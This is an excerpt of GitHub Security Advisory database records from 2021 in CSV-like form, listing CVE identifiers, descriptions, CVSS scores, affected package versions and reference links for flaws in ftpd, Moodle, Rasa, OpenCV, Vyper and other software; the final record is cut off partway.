+1.4.0,GHSA-7vxr-6cxg-j3x8,2021-10-07T18:59:04Z,2021-10-12T22:33:59Z,,['CVE-2013-2512'],OS Command Injection in ftpd,The ftpd gem 0.2.1 for Ruby allows remote attackers to execute arbitrary OS commands via shell metacharacters in a LIST or NLST command argument within FTP protocol traffic.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'ftpd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2013-2512'}, {'type': 'WEB', 'url': 'https://github.com/wconrad/ftpd/commit/828064f1a0ab69b2642c59cab8292a67bb44182c'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ftpd/CVE-2013-2512.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/wconrad/ftpd'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20210206231123/http://vapidlabs.com/advisory.php?v=34'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T18:59:04Z', 'nvd_published_at': '2021-01-26T23:15:00Z'}"
+1.4.0,GHSA-mcwm-2wmc-6hv4,2021-10-06T00:23:01Z,2021-10-06T00:23:01Z,2021-10-06T00:23:01Z,['CVE-2021-31957'],ASP.NET Core Denial of Service Vulnerability,"# Withdrawn
+
+This advisory was initially published and mapped incorrectly to nuget `Microsoft.NETCore.App.Ref`. We later reanalyzed this advisory and found it does not have a direct mapping to a NuGet package. Thus we have withdrawn this advisory.
+
+The underlying ASP.NET Core Denial of Service Vulnerability and CVE-2021-31957 remain legitimate.
+
+# Description.
+
+Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 5.0 and .NET Core 3.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
+
+A denial of service vulnerability exists when ASP.NET Core improperly handles client disconnect. An attacker who successfully exploited this vulnerability could cause a denial of service against an ASP.NET Core web application. The vulnerability can be exploited remotely, without authentication.
+
+
+### Patches
+
+* If you're using .NET 5.0, you should download and install Runtime 5.0.7 or SDK 5.0.204 (for Visual Studio 2019 v16.8) or SDK 5.0.301 (for Visual Studio 2019 16.10) from https://dotnet.microsoft.com/download/dotnet-core/5.0.
+
+* If you're using .NET Core 3.1, you should download and install Runtime 3.1.16 or SDK 3.1.116 (for Visual Studio 2019 v16.4) or 3.1.410 (for Visual Studio 2019 v16.5 or later) from https://dotnet.microsoft.com/download/dotnet-core/3.1.
+
+
+
+#### Other Details
+
+- Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/188
+- An Issue for this can be found at https://github.com/dotnet/aspnetcore/issues/33369
+- MSRC details for this can be found at https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31957
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Ref'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.16'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NETCore.App.Ref'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dotnet/aspnetcore/security/advisories/GHSA-mcwm-2wmc-6hv4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31957'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/aspnetcore'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4PRVVLXXQEF4SEJOBV3VRJHGX7YHY2CG/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CVCDYIP4A6DDRT7G6P3ZW6PKNK2DNWJ2/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PMHWHRRYDHKM6BIINW5V7OCSW4SDWB4W/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VMAO4NG2OQ4PCXUQWMNSCMYWLIJJY6UY/'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31957'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-05T19:41:18Z', 'nvd_published_at': '2021-06-08T23:15:00Z'}"
+1.4.0,GHSA-v6w3-2prq-h95f,2021-10-06T13:31:54Z,2021-10-06T17:48:38Z,,['CVE-2021-28170'],Improper Input Validation in Jakarta Expression Language,"In the Jakarta Expression Language implementation 3.0.3 and earlier, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.sun.el:el-ri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28170'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/el-ri/issues/155'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-ee4j/el-ri/pull/160/commits/b6a3943ac5fba71cbc6719f092e319caa747855b'}, {'type': 'PACKAGE', 'url': 'https://github.com/eclipse-ee4j/el-ri'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-021-jakarta-el/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-20', 'CWE-917'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T13:31:54Z', 'nvd_published_at': '2021-05-26T22:15:00Z'}"
+1.4.0,GHSA-m8wh-mqgf-rr8g,2021-10-12T16:59:26Z,2021-10-12T17:50:25Z,,['CVE-2021-25738'],Code injection in Kubernetes Java Client,Loading specially-crafted yaml with the Kubernetes Java Client library can lead to code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.kubernetes:client-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25738'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes-client/java/issues/1698'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes-client/java'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-announce/c/K_pOK2WbAJk'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2022/08/23/2'}]","{'cwe_ids': ['CWE-20', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-12T16:59:26Z', 'nvd_published_at': '2021-10-11T19:15:00Z'}"
+1.4.0,GHSA-c7v4-m269-4995,2021-10-20T16:46:12Z,2021-10-21T17:49:08Z,,['CVE-2020-25703'],Exposure of Sensitive Information to an Unauthorized Actor in Moodle,"The participants table download in Moodle always included user emails, but should have only done so when users' emails are not hidden. Versions affected: 3.9 to 3.9.2, 3.8 to 3.8.5 and 3.7 to 3.7.8. This is fixed in moodle 3.9.3, 3.8.6, 3.7.9, and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0-beta'}, {'fixed': '3.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25703'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895439'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413941'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:46:12Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}"
+1.4.0,GHSA-pvh2-pj76-4m96,2021-10-25T20:07:57Z,2021-10-19T15:28:35Z,,['CVE-2021-41153'],Specification non-compliance in JUMPI,"### Impact
+
+In `evm` crate `< 0.31.0`, `JUMPI` opcode's condition is checked after the destination validity check. However, according to Geth and OpenEthereum, the condition check should happen before the destination validity check.
+
+### Patches
+
+This is a **high** severity security advisory if you use `evm` crate for Ethereum mainnet. In this case, you should update your library dependency immediately to on or after `0.31.0`.
+
+This is a **low** severity security advisory if you use `evm` crate in Frontier or in a standalone blockchain, because there's no security exploit possible with this advisory. It is **not** recommended to update to on or after `0.31.0` until all the normal chain upgrade preparations have been done. If you use Frontier or other `pallet-evm` based Substrate blockchain, please ensure to update your `spec_version` before updating this. For other blockchains, please make sure to follow a hard-fork process before you update this.
+
+### Workarounds
+
+If you are dependent on an older version of `evm` and cannot update due to API interface changes, please contact Wei by email (wei@that.world), who will be happy to help you to publish patch releases for older `evm` versions.
+
+### References
+
+Fix PR: https://github.com/rust-blockchain/evm/pull/67
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in the `evm` repo.
+
+### Special thanks
+
+Special thanks to @rakita for reporting this issue.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'evm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rust-blockchain/evm/security/advisories/GHSA-pvh2-pj76-4m96'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41153'}, {'type': 'WEB', 'url': 'https://github.com/rust-blockchain/evm/pull/67'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-blockchain/evm'}]","{'cwe_ids': ['CWE-670'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-18T21:06:02Z', 'nvd_published_at': '2021-10-18T21:15:00Z'}"
+1.4.0,GHSA-j23j-q57m-63v3,2021-10-13T17:39:25Z,2021-10-13T18:54:50Z,,[],Denial of service in DataCommunicator class in Vaadin 8,Missing check in `DataCommunicator` class in `com.vaadin:vaadin-server` versions 8.0.0 through 8.14.0 (Vaadin 8.0.0 through 8.14.0) allows authenticated network attacker to cause heap exhaustion by requesting too many rows of data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.14.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-j23j-q57m-63v3'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/12415'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33609'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:39:25Z', 'nvd_published_at': None}"
+1.4.0,GHSA-4365-fhm5-qcrx,2021-10-21T20:32:19Z,2021-10-22T16:19:13Z,,['CVE-2021-41127'],Maliciously Crafted Model Archive Can Lead To Arbitrary File Write,"### Impact
+An Archive Extraction (Zip Slip) vulnerability in the functionality that allows a user to load a trained model archive in Rasa 2.8.9 and older allows an attacker arbitrary write capability within specific directories using a malicious crafted archive file.
+
+### Patches
+The vulnerability is fixed in Rasa 2.8.10
+
+### Workarounds
+Mitigating steps for vulnerable end users are to ensure that they do not upload untrusted model files, and restrict CLI or API endpoint access where a malicious actor could target a deployed Rasa instance.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email [the Rasa Security Team](mailto:security@rasa.com)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'rasa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/RasaHQ/rasa/security/advisories/GHSA-4365-fhm5-qcrx'}, {'type': 'WEB', 'url': 'https://github.com/RasaHQ/rasa/commit/1b6b502f52d73b4f8cd1959ce724b8ad0eb33989'}, {'type': 'PACKAGE', 'url': 'https://github.com/RasaHQ/rasa'}]","{'cwe_ids': ['CWE-22', 'CWE-23'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T20:32:19Z', 'nvd_published_at': '2021-10-21T21:15:00Z'}"
+1.4.0,GHSA-33h2-69j3-r336,2021-11-18T00:07:15Z,2021-10-12T22:00:51Z,,['CVE-2017-12598'],Out-of-bounds Read in OpenCV ,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has an out-of-bounds read error in the cv::RBaseStream::readBlock function in modules/imgcodecs/src/bitstrm.cpp when reading an image file by using cv::imread, as demonstrated by the 8-opencv-invalid-read-fread test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12598'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:49:53Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}"
+1.4.0,GHSA-r7rh-g777-g5gx,2021-10-18T14:34:41Z,2021-10-12T18:49:23Z,,['CVE-2021-28661'],SilverStripe GraphQL Server permission checker not inherited by query subclass.,Default SilverStripe GraphQL Server (aka silverstripe/graphql) 3.x through 3.4.1 permission checker not inherited by query subclass.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28661'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/pull/407/commits/16961459f681f7b32145296189dfdbcc7715e6ed'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-graphql'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases/tag/3.5.2'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2021-28661'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T21:35:47Z', 'nvd_published_at': '2021-10-07T15:15:00Z'}"
+1.4.0,GHSA-957j-59c2-j692,2023-09-07T18:57:59Z,2021-10-12T16:26:37Z,,['CVE-2020-28282'],Prototype pollution in getobject,Prototype pollution vulnerability in 'getobject' version 0.1.0 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'getobject'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28282'}, {'type': 'PACKAGE', 'url': 'https://github.com/cowboy/node-getobject'}, {'type': 'WEB', 'url': 'https://github.com/cowboy/node-getobject/blob/aba04a8e1d6180eb39eff09990c3a43886ba8937/lib/getobject.js#L48'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28282'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:07:57Z', 'nvd_published_at': '2020-12-29T18:15:00Z'}"
+1.4.0,GHSA-h7vq-5qgw-jwwq,2021-10-18T19:11:00Z,2021-10-18T19:04:16Z,,['CVE-2021-41824'],CSV Injection Vulnerability,"### Impact
+In some circumstances, it was possible to export data in CSV format that could trigger a payload in old versions of Excel.
+
+If you are accepting user input from untrusted sources and will be exporting that data in CSV format from element index pages and there is a chance users will open that on old versions of Excel, then you should update.
+
+### Patches
+This has been patched in Craft 3.7.14.
+
+### References
+* https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3714---2021-09-28
+* https://twitter.com/craftcmsupdates/status/1442928690145366018
+
+### For more information
+
+If you have any questions or comments about this advisory, email us at support@craftcms.com
+
+----------
+
+Credits: BAE Systems AI Vulnerability Research Team – Azrul Ikhwan Zulkifli","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.4.0'}, {'fixed': '3.7.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-h7vq-5qgw-jwwq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41824'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/c9cb2225f1b908fb1e8401d401219228634b26b2'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3714---2021-09-28'}, {'type': 'WEB', 'url': 'https://twitter.com/craftcmsupdates/status/1442928690145366018'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-15T17:36:16Z', 'nvd_published_at': '2021-09-30T00:15:00Z'}"
+1.4.0,GHSA-c7pr-343r-5c46,2021-10-06T13:26:05Z,2021-10-06T17:48:46Z,,['CVE-2021-41122'],missing clamps for decimal args in external functions,"### Impact
+
+The following code does not properly validate that its input is in bounds.
+
+```python
+@external
+def foo(x: decimal) -> decimal:
+ return x
+```
+
+### Patches
+0.3.0 / #2447
+
+### Workarounds
+Don't use decimal args
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-c7pr-343r-5c46'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41122'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2447'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]","{'cwe_ids': ['CWE-682'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T13:26:05Z', 'nvd_published_at': '2021-10-05T23:15:00Z'}"
+1.4.0,GHSA-m2r3-8492-vx59,2021-10-06T15:13:57Z,2021-10-06T17:47:46Z,,['CVE-2021-23372'],Denial of Service (DoS) in mongo-express,"All versions of package mongo-express are vulnerable to Denial of Service (DoS) when exporting an empty collection as CSV, due to an unhandled exception, leading to a crash.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'mongo-express'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.54.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23372'}, {'type': 'PACKAGE', 'url': 'https://github.com/mongo-express/mongo-express'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-1085403'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T15:13:57Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}"
+1.4.0,GHSA-g6v7-vqhx-6v6c,2021-10-18T13:50:38Z,2021-10-12T17:23:40Z,,['CVE-2021-3312'],XML External Entity Reference in org.opencms:opencms-core,"An XML external entity (XXE) vulnerability in Alkacon OpenCms 11.0, 11.0.1 and 11.0.2 allows remote authenticated users with edit privileges to exfiltrate files from the server's file system by uploading a crafted SVG document.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opencms:opencms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '12.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.0.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3312'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/issues/721'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/issues/725'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/commit/92e035423aa6967822d343e54392d4291648c0ee'}, {'type': 'PACKAGE', 'url': 'https://github.com/alkacon/opencms-core'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/releases'}]","{'cwe_ids': ['CWE-611'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-11T18:55:10Z', 'nvd_published_at': '2021-10-08T15:15:00Z'}"
+1.4.0,GHSA-m5v7-pr32-mjx2,2021-11-18T20:37:40Z,2021-10-12T16:29:13Z,,['CVE-2020-13909'],Critical severity vulnerability in Ignition,"The Ignition page before version 2.0.5 for Laravel mishandles globals, _get, _post, _cookie, and _env.
+
+NOTE: in the 1.x series, versions 1.16.15 and later are unaffected as a consequence of the CVE-2021-43996 fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.5'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'facade/ignition'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13909'}, {'type': 'WEB', 'url': 'https://github.com/github/advisory-database/issues/2316'}, {'type': 'PACKAGE', 'url': 'https://github.com/facade/ignition'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/compare/2.0.4...2.0.5'}, {'type': 'WEB', 'url': 'https://github.com/facade/ignition/releases/tag/2.0.5'}, {'type': 'WEB', 'url': 'https://www.cve.org/CVERecord?id=CVE-2020-13909'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:26:02Z', 'nvd_published_at': '2020-06-07T20:15:00Z'}"
+1.4.0,GHSA-vmfh-c547-v45h,2021-10-06T13:46:32Z,2021-10-06T17:48:27Z,,['CVE-2021-33575'],Remote code execution in ruby-jss,The Pixar ruby-jss gem before 1.6.0 allows remote attackers to execute arbitrary code because of the Plist gem's documented behavior of using Marshal.load during XML document processing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'ruby-jss'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33575'}, {'type': 'PACKAGE', 'url': 'https://github.com/PixarAnimationStudios/ruby-jss'}, {'type': 'WEB', 'url': 'https://github.com/PixarAnimationStudios/ruby-jss/blob/e6d48dd8c77f9275c76787d60d3472615fcd9b77/CHANGES.md#160---2021-05-24'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-vmfh-c547-v45h'}, {'type': 'WEB', 'url': 'https://github.com/patsplat/plist/tree/ce8f9ae42a114f603ea200c955e420782bffc4ad#label-Security+considerations'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/ruby-jss/CVE-2021-33575.yml'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T13:46:32Z', 'nvd_published_at': '2021-05-25T23:15:00Z'}"
+1.4.0,GHSA-m43c-649m-pm48,2021-11-18T15:31:29Z,2021-10-12T22:03:32Z,,['CVE-2017-1000450'],Integer Overflow or Wraparound in OpenCV.,"In opencv/modules/imgcodecs/src/utils.cpp, functions FillUniColor and FillUniGray do not check the input length, which can lead to integer overflow. If the image is from remote, may lead to remote code execution or denial of service. This affects Opencv 3.3 (corresponding with OpenCV-Python 3.3.0.9) and earlier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-1000450'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9723'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9726/commits/c58152d94ba878b2d7d76bcac59146312199b9eb'}, {'type': 'WEB', 'url': 